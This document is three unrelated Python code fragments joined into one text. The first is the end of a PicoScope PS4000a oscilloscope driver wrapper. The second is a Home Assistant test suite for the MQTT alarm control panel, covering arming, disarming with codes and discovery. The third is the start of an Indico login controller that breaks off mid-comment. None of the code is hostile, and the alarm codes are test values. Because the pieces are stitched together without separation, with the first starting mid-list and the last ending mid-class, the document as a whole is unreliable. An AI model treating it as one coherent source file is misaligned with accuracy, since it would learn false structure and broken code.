"PICO_OS_NOT_SUPPORTED", "The OS is not supported"], [0x0C, "PICO_INVALID_HANDLE", "?"], [0x0D, "PICO_INVALID_PARAMETER", "?"], [0x0E, "PICO_INVALID_TIMEBASE", "?"], [0x0F, "PICO_INVALID_VOLTAGE", "?"] ] MY_ERROR_CODES = { "PICO_OK": 0x00, "PICO_USB_3_0_DEVICE_NON_USB3_0_PORT": 0x11E } CHANNEL_COUPLINGS = {"AC": 0, "DC": 1} has_sig_gen = True WAVE_TYPES = {"Sine": 0, "Square": 1, "Triangle": 2, "RampUp": 3, "RampDown": 4, "Sinc": 5, "Gaussian": 6, "HalfSine": 7, "DCVoltage": 8, "WhiteNoise": 9} SIGGEN_TRIGGER_TYPES = {"Rising": 0, "Falling": 1, "GateHigh": 2, "GateLow": 3} SIGGEN_TRIGGER_SOURCES = {"None": 0, "ScopeTrig": 1, "AuxIn": 2, "ExtIn": 3, "SoftTrig": 4, "TriggerRaw": 5} AWGPhaseAccumulatorSize = 32 AWGBufferAddressWidth = 14 AWGMaxSamples = 2 ** AWGBufferAddressWidth AWGDACInterval = 12.5E-9 # in seconds AWGDACFrequency = 1 / AWGDACInterval # Note this is NOT what is written in the Programming guide as of version # 10_5_0_28 # This issue was acknowledged in this thread # http://www.picotech.com/support/topic13217.html AWGMaxVal = 0x0FFF AWGMinVal = 0x0000 AWG_INDEX_MODES = {"Single": 0, "Dual": 1, "Quad": 2} TIME_UNITS = {"FS": 0, "PS": 1, "NS": 2, "US": 3, "MS": 4, "S": 5} MAX_VALUE = 32767 MIN_VALUE = -32767 MAX_TIMEBASES = 2**32-1 # variable depending on model UNIT_INFO_TYPES = {"DriverVersion" : 0x0, "USBVersion" : 0x1, "HardwareVersion" : 0x2, "VarianInfo" : 0x3, "BatchAndSerial" : 0x4, "CalDate" : 0x5, # "ErrorCode" : 0x6, "KernelVersion" : 0x6} channelBuffersPtr = [c_void_p()]*NUM_CHANNELS channelBuffersLen = [0]*NUM_CHANNELS def __init__(self, serialNumber=None, connect=True): """Load DLL etc""" if platform.system() == 'Linux': from ctypes import cdll self.lib = cdll.LoadLibrary("lib" + self.LIBNAME + ".so") else: from ctypes import windll self.lib = windll.LoadLibrary(self.LIBNAME + ".dll") super(PS4000a, self).__init__(serialNumber, connect) def _lowLevelOpenUnit(self, sn): c_handle = c_int16() c_serial = c_int8() if sn: m = self.lib.ps4000aOpenUnit(byref(c_handle), byref(sn)) else: m = self.lib.ps4000aOpenUnit(byref(c_handle), None) if c_handle.value > 0: self.handle = c_handle.value if (m == self.MY_ERROR_CODES["PICO_USB_3_0_DEVICE_NON_USB3_0_PORT"]): m = self.lib.ps4000aChangePowerSource(c_handle, c_uint32(m)) if m < 0: raise IOError("Failed to Find PS4000a Unit.") self.suggested_time_units = self.TIME_UNITS["NS"] def _lowLevelCloseUnit(self): m = self.lib.ps4000aCloseUnit(c_int16(self.handle)) self.checkResult(m) def _lowLevelSetChannel(self, chNum, enabled, coupling, VRange, VOffset, BWLimited): if abs(VOffset) > 0.: maxOffset = c_float(); minOffset = c_float() m = self.lib.ps4000aGetAnalogueOffset(c_int16(self.handle), c_enum(VRange), c_enum(coupling), byref(maxOffset), byref(minOffset)) self.checkResult(m) if VOffset > maxOffset.value or VOffset < minOffset.value: raise ValueError('PS4000a setChannel: invalid offset %f V'%VOffset) m = self.lib.ps4000aSetChannel(c_int16(self.handle), c_enum(chNum), c_int16(enabled), c_enum(coupling), c_enum(VRange), c_float(VOffset)) self.checkResult(m) def _lowLevelSetSimpleTrigger(self, enabled, trigsrc, threshold_adc, direction, timeout_ms, auto): m = self.lib.ps4000aSetSimpleTrigger( c_int16(self.handle), c_int16(enabled), c_enum(trigsrc), c_int16(threshold_adc), c_enum(direction), c_uint32(timeout_ms), c_int16(auto)) self.checkResult(m) def _lowLevelStop(self): m = self.lib.ps4000aStop(c_int16(self.handle)) self.checkResult(m) def _lowLevelRunBlock(self, numPreTrigSamples, numPostTrigSamples, timebase, oversample, segmentIndex): #TODO: Fix 'delay' which is where trigger occurs in block #TODO: Add callbacks timeIndisposedMs = c_int32() m = self.lib.ps4000aRunBlock( c_int16(self.handle), c_int32(numPreTrigSamples), c_int32(numPostTrigSamples),c_uint32(timebase),byref(timeIndisposedMs),c_uint32(segmentIndex),None,None) if not m==0: raise IOError('Error calling %s: parameter out of range'%(inspect.stack()[1][3])) return timeIndisposedMs.value def _lowLevelGetUnitInfo(self, info): s = create_string_buffer(256) requiredSize = c_int16(0) m = self.lib.ps4000aGetUnitInfo(c_int16(self.handle), byref(s), c_int16(len(s)), byref(requiredSize), c_enum(info)) self.checkResult(m) if requiredSize.value > len(s): s = create_string_buffer(requiredSize.value + 1) m = self.lib.ps4000aGetUnitInfo(c_int16(self.handle), byref(s), c_int16(len(s)), byref(requiredSize), c_enum(info)) self.checkResult(m) # should this be ascii instead? # I think they are equivalent... return s.value.decode('utf-8') def _lowLevelFlashLed(self,times): m = self.lib.ps4000aFlashLed(c_int16(self.handle),c_int16(times)) self.checkHandleResult(m) def checkHandleResult(self,ec): if not ec==0: raise IOError('Error calling %s: invalid handle given'%(inspect.stack()[1][3])) def checkResult(self,ec): if not ec==0: print('ec:',ec) raise IOError('Error calling %s: '%(inspect.stack()[1][3])) def _lowLevelEnumerateUnits(self): count = c_int16(0) m = self.lib.ps4000aEnumerateUnits(byref(count), None, None) self.checkResult(m) # a serial number is rouhgly 8 characters # an extra character for the comma # and an extra one for the space after the comma? # the extra two also work for the null termination serialLth = c_int16(count.value * (8 + 2)) serials = create_string_buffer(serialLth.value + 1) m = self.lib.ps4000aEnumerateUnits(byref(count), serials, byref(serialLth)) self.checkResult(m) serialList = str(serials.value.decode('utf-8')).split(',') serialList = [x.strip() for x in serialList] return serialList def getTimeBaseNum(self, sampleTimeS): time_interval = c_int32() max_samples = c_int32() tb = int(sampleTimeS/12.5e-9)-1 if tb>0 and tb<self.MAX_TIMEBASES: rv = self.lib.ps4000aGetTimebase(c_int16(self.handle), c_uint32(tb), c_int32(512), byref(time_interval), byref(max_samples), c_uint32(0)) if rv ==0: return tb else: self.checkResult(rv) def getTimestepFromTimebase(self, timebase): time_interval = c_int32() m = self.lib.ps4000aGetTimebase(c_int16(self.handle), c_uint32(timebase), c_int32(512), byref(time_interval), c_void_p(), c_uint32(0)) if not m==0: raise IOError('Error calling %s: invalid parameters given'%(inspect.stack()[1][3])) return (time_interval.value / 1.0E9) def _lowLevelGetTimebase(self, tb, noSamples, oversample, segmentIndex): """ return (timeIntervalSeconds, maxSamples). """ maxSamples = c_int32() interval = c_int32() time_units = c_int16() m = self.lib.ps4000aGetTimebase(c_int16(self.handle), c_uint32(tb), c_int32(noSamples), byref(interval), byref(maxSamples), c_uint32(0)) if not m==0: raise IOError('Error calling %s: invalid parameters given'%(inspect.stack()[1][3])) return (interval.value/1e9, maxSamples.value) def _lowLevelIsReady(self): ready = c_int16() self.lib.ps4000aIsReady(c_int16(self.handle),byref(ready)) if not ready.value == 0: return True else: return False def _lowLevelGetValues(self, numSamples, startIndex, downSampleRatio, downSampleMode, segmentIndex): #TODO: Check overflow in channelBuffersLen against numSamples, but need to # not raise error if channelBuffersPtr is void overflow = c_int16() numSamples = c_uint32(numSamples) m = self.lib.ps4000aGetValues( c_int16(self.handle), c_uint32(startIndex), byref(numSamples), c_uint32(downSampleRatio), #downsample factor c_enum(downSampleMode), c_uint32(segmentIndex), byref(overflow)) if m == 0: return (numSamples.value, overflow.value) else: self.checkResult(m) def _lowLevelSetDataBuffer(self, channel, data, downSampleMode, segmentIndex): dataPtr = data.ctypes.data_as(POINTER(c_int16)) numSamples = len(data) self.channelBuffersPtr[channel] = dataPtr self.channelBuffersLen[channel] = numSamples m = self.lib.ps4000aSetDataBuffer(c_int16(self.handle),c_enum(channel),self.channelBuffersPtr[channel],c_int32(numSamples),c_uint32(segmentIndex),c_enum(downSampleMode)) self.checkResult(m) def _lowLevelClearDataBuffer(self, channel, segmentIndex): m = self.lib.ps4000aSetDataBuffer(c_int16(self.handle), c_enum(channel), c_void_p(), c_int32(0), c_uint32(segmentIndex), c_enum(0)) self.checkResult(m) def _lowLevelSetSigGenBuiltInSimple(self, offsetVoltage, pkToPk, waveType, frequency, shots, triggerType, triggerSource): m = self.lib.ps4000aSetSigGenBuiltIn( c_int16(self.handle), c_int32(int(offsetVoltage * 1000000)), c_uint32(int(pkToPk * 1000000)), c_enum(waveType), c_double(frequency), c_double(frequency), c_double(0), c_double(0), c_enum(0), c_enum(0), c_uint32(shots), c_uint32(0), c_enum(triggerType), c_enum(triggerSource), c_int16(0)) self.checkResult(m) def setWhiteNoise(self,pkToPk): offsetVoltage = 0. m = self.lib.ps4000aSetSigGenBuiltIn( c_int16(self.handle), c_int32(int(0 * 1000000)), c_uint32(int(pkToPk * 1000000)), c_enum(0), #for white noise c_double(1000.), c_double(1000.), c_double(0), c_double(.1), c_enum(0), c_enum(1), c_uint32(0), c_uint32(0), c_enum(0), c_enum(0), #trigger type and source c_int16(0)) self.checkResult(m) def _lowLevelSetAWGSimpleDeltaPhase(self, waveform, deltaPhase, offsetVoltage, pkToPk, indexMode, shots, triggerType, triggerSource): """ waveform should be an array of shorts """ waveformPtr = waveform.ctypes.data_as(POINTER(c_int16)) m = self.lib.ps4000aSetSigGenArbitrary( c_int16(self.handle), c_int32(int(offsetVoltage * 1E6)), # offset voltage in microvolts c_uint32(int(pkToPk * 1E6)), # pkToPk in microvolts c_uint32(int(deltaPhase)), # startDeltaPhase c_uint32(int(deltaPhase)), # stopDeltaPhase c_uint32(0), # deltaPhaseIncrement c_uint32(0), # dwellCount waveformPtr, # arbitraryWaveform c_int32(len(waveform)), # arbitraryWaveformSize c_enum(0), # sweepType for deltaPhase c_enum(0), # operation (adding random noise and whatnot) c_enum(indexMode), # single, dual, quad c_uint32(shots), c_uint32(0), # sweeps c_uint32(triggerType), c_uint32(triggerSource), c_int16(0)) # extInThreshold self.checkResult(m)
"""The tests the MQTT alarm control panel component.""" import copy import json from unittest.mock import patch import pytest from homeassistant.components import alarm_control_panel from homeassistant.const import ( STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_CUSTOM_BYPASS, STATE_ALARM_ARMED_HOME, STATE_ALARM_ARMED_NIGHT, STATE_ALARM_ARMING, STATE_ALARM_DISARMED, STATE_ALARM_DISARMING, STATE_ALARM_PENDING, STATE_ALARM_TRIGGERED, STATE_UNKNOWN, ) from homeassistant.setup import async_setup_component from .test_common import ( help_test_availability_when_connection_lost, help_test_availability_without_topic, help_test_custom_availability_payload, help_test_default_availability_payload, help_test_discovery_broken, help_test_discovery_removal, help_test_discovery_update, help_test_discovery_update_attr, help_test_discovery_update_unchanged, help_test_entity_debug_info_message, help_test_entity_device_info_remove, help_test_entity_device_info_update, help_test_entity_device_info_with_connection, help_test_entity_device_info_with_identifier, help_test_entity_id_update_discovery_update, help_test_entity_id_update_subscriptions, help_test_setting_attribute_via_mqtt_json_message, help_test_setting_attribute_with_template, help_test_unique_id, help_test_update_with_json_attrs_bad_JSON, help_test_update_with_json_attrs_not_dict, ) from tests.common import assert_setup_component, async_fire_mqtt_message from tests.components.alarm_control_panel import common CODE_NUMBER = "1234" CODE_TEXT = "HELLO_CODE" DEFAULT_CONFIG = { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", } } DEFAULT_CONFIG_CODE = { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", "code": "0123", "code_arm_required": True, } } async def test_fail_setup_without_state_topic(hass, mqtt_mock): """Test for failing with no state topic.""" with assert_setup_component(0) as config: assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "command_topic": "alarm/command", } }, ) assert not config[alarm_control_panel.DOMAIN] async def test_fail_setup_without_command_topic(hass, mqtt_mock): """Test failing with no command topic.""" with assert_setup_component(0): assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "state_topic": "alarm/state", } }, ) async def test_update_state_via_state_topic(hass, mqtt_mock): """Test updating with via state topic.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() entity_id = "alarm_control_panel.test" assert hass.states.get(entity_id).state == STATE_UNKNOWN for state in ( STATE_ALARM_DISARMED, STATE_ALARM_ARMED_HOME, STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_NIGHT, STATE_ALARM_ARMED_CUSTOM_BYPASS, STATE_ALARM_PENDING, STATE_ALARM_ARMING, STATE_ALARM_DISARMING, STATE_ALARM_TRIGGERED, ): async_fire_mqtt_message(hass, "alarm/state", state) assert hass.states.get(entity_id).state == state async def test_ignore_update_state_if_unknown_via_state_topic(hass, mqtt_mock): """Test ignoring updates via state topic.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() entity_id = "alarm_control_panel.test" assert hass.states.get(entity_id).state == STATE_UNKNOWN async_fire_mqtt_message(hass, "alarm/state", "unsupported state") assert hass.states.get(entity_id).state == STATE_UNKNOWN async def test_arm_home_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_arm_home(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_HOME", 0, False ) async def test_arm_home_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid. When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_home(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_home_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code_arm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_arm_home(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_HOME", 0, False ) async def test_arm_away_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_arm_away(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_AWAY", 0, False ) async def test_arm_away_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid code. When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_away(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_away_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code_arm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_arm_away(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_AWAY", 0, False ) async def test_arm_night_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_arm_night(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_NIGHT", 0, False ) async def test_arm_night_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid code. When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_night(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_night_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code_arm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_arm_night(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_NIGHT", 0, False ) async def test_arm_custom_bypass_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while armed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", } }, ) await hass.async_block_till_done() await common.async_alarm_arm_custom_bypass(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_CUSTOM_BYPASS", 0, False ) async def test_arm_custom_bypass_not_publishes_mqtt_with_invalid_code_when_req( hass, mqtt_mock ): """Test not publishing of MQTT messages with invalid code. When code_arm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", "code": "1234", "code_arm_required": True, } }, ) await hass.async_block_till_done() call_count = mqtt_mock.async_publish.call_count await common.async_alarm_arm_custom_bypass(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_arm_custom_bypass_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages. When code_arm_required = False """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "state_topic": "alarm/state", "command_topic": "alarm/command", "code": "1234", "code_arm_required": False, } }, ) await hass.async_block_till_done() await common.async_alarm_arm_custom_bypass(hass) mqtt_mock.async_publish.assert_called_once_with( "alarm/command", "ARM_CUSTOM_BYPASS", 0, False ) async def test_disarm_publishes_mqtt(hass, mqtt_mock): """Test publishing of MQTT messages while disarmed.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG, ) await hass.async_block_till_done() await common.async_alarm_disarm(hass) mqtt_mock.async_publish.assert_called_once_with("alarm/command", "DISARM", 0, False) async def test_disarm_publishes_mqtt_with_template(hass, mqtt_mock): """Test publishing of MQTT messages while disarmed. When command_template set to output json """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code"] = "0123" config[alarm_control_panel.DOMAIN][ "command_template" ] = '{"action":"{{ action }}","code":"{{ code }}"}' assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_disarm(hass, "0123") mqtt_mock.async_publish.assert_called_once_with( "alarm/command", '{"action":"DISARM","code":"0123"}', 0, False ) async def test_disarm_publishes_mqtt_when_code_not_req(hass, mqtt_mock): """Test publishing of MQTT messages while disarmed. When code_disarm_required = False """ config = copy.deepcopy(DEFAULT_CONFIG_CODE) config[alarm_control_panel.DOMAIN]["code"] = "1234" config[alarm_control_panel.DOMAIN]["code_disarm_required"] = False assert await async_setup_component( hass, alarm_control_panel.DOMAIN, config, ) await hass.async_block_till_done() await common.async_alarm_disarm(hass) mqtt_mock.async_publish.assert_called_once_with("alarm/command", "DISARM", 0, False) async def test_disarm_not_publishes_mqtt_with_invalid_code_when_req(hass, mqtt_mock): """Test not publishing of MQTT messages with invalid code. When code_disarm_required = True """ assert await async_setup_component( hass, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE, ) call_count = mqtt_mock.async_publish.call_count await common.async_alarm_disarm(hass, "abcd") assert mqtt_mock.async_publish.call_count == call_count async def test_update_state_via_state_topic_template(hass, mqtt_mock): """Test updating with template_value via state topic.""" assert await async_setup_component( hass, alarm_control_panel.DOMAIN, { alarm_control_panel.DOMAIN: { "platform": "mqtt", "name": "test", "command_topic": "test-topic", "state_topic": "test-topic", "value_template": "\ {% if (value | int) == 100 %}\ armed_away\ {% else %}\ disarmed\ {% endif %}", } }, ) await hass.async_block_till_done() state = hass.states.get("alarm_control_panel.test") assert state.state == STATE_UNKNOWN async_fire_mqtt_message(hass, "test-topic", "100") state = hass.states.get("alarm_control_panel.test") assert state.state == STATE_ALARM_ARMED_AWAY async def test_attributes_code_number(hass, mqtt_mock): """Test attributes which are not supported by the vacuum.""" config = copy.deepcopy(DEFAULT_CONFIG) config[alarm_control_panel.DOMAIN]["code"] = CODE_NUMBER assert await async_setup_component(hass, alarm_control_panel.DOMAIN, config) await hass.async_block_till_done() state = hass.states.get("alarm_control_panel.test") assert ( state.attributes.get(alarm_control_panel.ATTR_CODE_FORMAT) == alarm_control_panel.FORMAT_NUMBER ) async def test_attributes_code_text(hass, mqtt_mock): """Test attributes which are not supported by the vacuum.""" config = copy.deepcopy(DEFAULT_CONFIG) config[alarm_control_panel.DOMAIN]["code"] = CODE_TEXT assert await async_setup_component(hass, alarm_control_panel.DOMAIN, config) await hass.async_block_till_done() state = hass.states.get("alarm_control_panel.test") assert ( state.attributes.get(alarm_control_panel.ATTR_CODE_FORMAT) == alarm_control_panel.FORMAT_TEXT ) async def test_availability_when_connection_lost(hass, mqtt_mock): """Test availability after MQTT disconnection.""" await help_test_availability_when_connection_lost( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_availability_without_topic(hass, mqtt_mock): """Test availability without defined availability topic.""" await help_test_availability_without_topic( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_default_availability_payload(hass, mqtt_mock): """Test availability by default payload with defined topic.""" await help_test_default_availability_payload( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_custom_availability_payload(hass, mqtt_mock): """Test availability by custom payload with defined topic.""" await help_test_custom_availability_payload( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG_CODE ) async def test_setting_attribute_via_mqtt_json_message(hass, mqtt_mock): """Test the setting of attribute via MQTT with JSON payload.""" await help_test_setting_attribute_via_mqtt_json_message( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_setting_attribute_with_template(hass, mqtt_mock): """Test the setting of attribute via MQTT with JSON payload.""" await help_test_setting_attribute_with_template( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_update_with_json_attrs_not_dict(hass, mqtt_mock, caplog): """Test attributes get extracted from a JSON result.""" await help_test_update_with_json_attrs_not_dict( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_update_with_json_attrs_bad_JSON(hass, mqtt_mock, caplog): """Test attributes get extracted from a JSON result.""" await help_test_update_with_json_attrs_bad_JSON( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_discovery_update_attr(hass, mqtt_mock, caplog): """Test update of discovered MQTTAttributes.""" await help_test_discovery_update_attr( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_unique_id(hass, mqtt_mock): """Test unique id option only creates one alarm per unique_id.""" config = { alarm_control_panel.DOMAIN: [ { "platform": "mqtt", "name": "Test 1", "state_topic": "test-topic", "command_topic": "command-topic", "unique_id": "TOTALLY_UNIQUE", }, { "platform": "mqtt", "name": "Test 2", "state_topic": "test-topic", "command_topic": "command-topic", "unique_id": "TOTALLY_UNIQUE", }, ] } await help_test_unique_id(hass, mqtt_mock, alarm_control_panel.DOMAIN, config) async def test_discovery_removal_alarm(hass, mqtt_mock, caplog): """Test removal of discovered alarm_control_panel.""" data = json.dumps(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) await help_test_discovery_removal( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data ) async def test_discovery_update_alarm_topic_and_template(hass, mqtt_mock, caplog): """Test update of discovered alarm_control_panel.""" config1 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config2 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config1["name"] = "Beer" config2["name"] = "Milk" config1["state_topic"] = "alarm/state1" config2["state_topic"] = "alarm/state2" config1["value_template"] = "{{ value_json.state1.state }}" config2["value_template"] = "{{ value_json.state2.state }}" state_data1 = [ ([("alarm/state1", '{"state1":{"state":"armed_away"}}')], "armed_away", None), ] state_data2 = [ ([("alarm/state1", '{"state1":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state1", '{"state2":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state2", '{"state1":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state2", '{"state2":{"state":"triggered"}}')], "triggered", None), ] data1 = json.dumps(config1) data2 = json.dumps(config2) await help_test_discovery_update( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, data2, state_data1=state_data1, state_data2=state_data2, ) async def test_discovery_update_alarm_template(hass, mqtt_mock, caplog): """Test update of discovered alarm_control_panel.""" config1 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config2 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config1["name"] = "Beer" config2["name"] = "Milk" config1["state_topic"] = "alarm/state1" config2["state_topic"] = "alarm/state1" config1["value_template"] = "{{ value_json.state1.state }}" config2["value_template"] = "{{ value_json.state2.state }}" state_data1 = [ ([("alarm/state1", '{"state1":{"state":"armed_away"}}')], "armed_away", None), ] state_data2 = [ ([("alarm/state1", '{"state1":{"state":"triggered"}}')], "armed_away", None), ([("alarm/state1", '{"state2":{"state":"triggered"}}')], "triggered", None), ] data1 = json.dumps(config1) data2 = json.dumps(config2) await help_test_discovery_update( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, data2, state_data1=state_data1, state_data2=state_data2, ) async def test_discovery_update_unchanged_alarm(hass, mqtt_mock, caplog): """Test update of discovered alarm_control_panel.""" config1 = copy.deepcopy(DEFAULT_CONFIG[alarm_control_panel.DOMAIN]) config1["name"] = "Beer" data1 = json.dumps(config1) with patch( "homeassistant.components.mqtt.alarm_control_panel.MqttAlarm.discovery_update" ) as discovery_update: await help_test_discovery_update_unchanged( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, discovery_update ) @pytest.mark.no_fail_on_log_exception async def test_discovery_broken(hass, mqtt_mock, caplog): """Test handling of bad discovery message.""" data1 = '{ "name": "Beer" }' data2 = ( '{ "name": "Milk",' ' "state_topic": "test_topic",' ' "command_topic": "test_topic" }' ) await help_test_discovery_broken( hass, mqtt_mock, caplog, alarm_control_panel.DOMAIN, data1, data2 ) async def test_entity_device_info_with_connection(hass, mqtt_mock): """Test MQTT alarm control panel device registry integration.""" await help_test_entity_device_info_with_connection( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_device_info_with_identifier(hass, mqtt_mock): """Test MQTT alarm control panel device registry integration.""" await help_test_entity_device_info_with_identifier( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_device_info_update(hass, mqtt_mock): """Test device registry update.""" await help_test_entity_device_info_update( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_device_info_remove(hass, mqtt_mock): """Test device registry remove.""" await help_test_entity_device_info_remove( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_id_update_subscriptions(hass, mqtt_mock): """Test MQTT subscriptions are managed when entity_id is updated.""" await help_test_entity_id_update_subscriptions( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_id_update_discovery_update(hass, mqtt_mock): """Test MQTT discovery update when entity_id is updated.""" await help_test_entity_id_update_discovery_update( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_debug_info_message(hass, mqtt_mock): """Test MQTT debug info.""" await help_test_entity_debug_info_message( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG )
# This file is part of Indico. # Copyright (C) 2002 - 2021 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from flask import flash, jsonify, redirect, render_template, request, session from itsdangerous import BadData, BadSignature from markupsafe import Markup from webargs import fields from werkzeug.exceptions import BadRequest, Forbidden, NotFound from indico.core import signals from indico.core.auth import login_rate_limiter, multipass from indico.core.config import config from indico.core.db import db from indico.core.notifications import make_email, send_email from indico.modules.admin import RHAdminBase from indico.modules.auth import Identity, logger, login_user from indico.modules.auth.forms import (AddLocalIdentityForm, EditLocalIdentityForm, LocalRegistrationForm, MultipassRegistrationForm, RegistrationEmailForm, ResetPasswordEmailForm, ResetPasswordForm, SelectEmailForm) from indico.modules.auth.models.registration_requests import RegistrationRequest from indico.modules.auth.util import impersonate_user, load_identity_info, register_user, undo_impersonate_user from indico.modules.auth.views import WPAuth, WPAuthUser from indico.modules.users import User from indico.modules.users.controllers import RHUserBase from indico.util.i18n import _ from indico.util.signing import secure_serializer from indico.web.args import use_kwargs from indico.web.flask.templating import get_template_module from indico.web.flask.util import url_for from indico.web.forms.base import FormDefaults, IndicoForm from indico.web.rh import RH from indico.web.util import url_for_index def _get_provider(name, external): try: provider = multipass.auth_providers[name] except KeyError: raise NotFound('Provider does not exist') if provider.is_external != external: raise NotFound('Invalid provider') return provider class RHLogin(RH): """The login page.""" # Disable global CSRF 